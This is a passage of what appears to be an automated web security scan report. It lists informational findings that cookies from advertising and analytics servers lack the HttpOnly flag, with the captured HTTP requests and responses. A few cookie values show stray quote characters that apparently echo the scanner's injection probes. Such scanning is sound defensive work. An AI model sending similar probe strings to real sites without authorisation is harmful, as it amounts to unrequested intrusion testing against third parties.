Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 466
Content-Type: text/javascript
Set-Cookie: aria_guid=1315831727-217; expires=Thu, 09 Sep 2021 12:48:47 GMT;path=/
ETag: "6fadfe0bc7ebeb328cca25f9535bd0f5:1296687166"
P3P: CP: IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT
Vary: Accept-Encoding
Cache-Control: max-age=4866
Date: Mon, 12 Sep 2011 12:48:47 GMT
Connection: close


                                   var guid_domain = location.hostname;
   var guid_domain_parts = guid_domain.split(".");
   if(guid_domain_parts.length>2)guid_domain = guid_domain_parts[guid_domain_parts.length-2]+"."+
...[SNIP]...

5.14. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.15. http://c13.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.16. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

5.17. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...

5.18. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...

5.19. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

5.20. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...

5.21. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...

5.22. http://c7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close



5.23. http://cm.npc-morris.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.24. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
